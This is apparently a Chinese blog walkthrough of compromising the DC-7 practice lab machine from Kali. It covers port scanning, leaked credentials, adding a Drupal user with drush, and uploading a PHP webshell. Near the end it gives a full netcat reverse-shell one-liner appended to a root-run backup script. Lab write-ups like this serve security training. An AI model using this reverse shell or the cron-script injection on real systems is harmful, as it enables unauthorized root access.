Kali渗透DC7

Kali渗透DC7,第1张

相同步骤,从官网下载靶机,设置网卡为nat开始靶机,同时启动Kali,使用nmap发现主机

得到主机地址,进一步扫描,搜集靶机开启的服务与端口

 

靶机开启了ssh服务22端口,http服务80端口。


打开浏览器访问靶机http服务

 

成功访问,发现搜索框,继续搜集信息查看是否有sql注入等漏洞

 

 

发现登陆框,但没有注入漏洞无法登陆,发现网页下面有dc7user,搜索信息

 

 

 

发现源码,查看配置源码

 

得到一个账户名与密码,尝试登录该网页

 

登录失败,再次尝试通过ssh登录靶机

 

成功登陆!查看用户信息,逐个查看文件

 

最终在该用户目录下发现mbox 文件,信息提示/opt/scripts/backups.sh该文件可以以dc7的root权限执行,查看该文件内容

百度查询文件中的drush 命令可以帮我们创建用户。


进入/bar/www/html使用该命令创建用户

成功创建,尝试登录靶机的http服务

 

 

成功登陆,尝试寻找上传路径,进行木马上传

 

发现无法上传,该网页不支持php 文件,尝试安装插件,

 

 

 

成功安装插件,尝试Php木马上传靶机网站是否执行

 

 

成功执行,打开Kali ssh尝试木马链接

 

 

链接成功,输入命令获得交互界面

 

查看文件

发现backups.sh 在该用户目录下。


用命令echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.172.131 2345 >/tmp/f" >> backups.sh将反dshell的命令写入到backups.sh文件中,当它定时自动执行时即可执行其中的反dshell语句,即可反d回shell,返回之后既是root权限,在root目录下找到flag。


 

 

欢迎分享,转载请注明来源:内存溢出

原文地址: https://outofmemory.cn/langs/563717.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2022-04-02
下一篇 2022-04-02

发表评论

登录后才能评论

评论列表(0条)

保存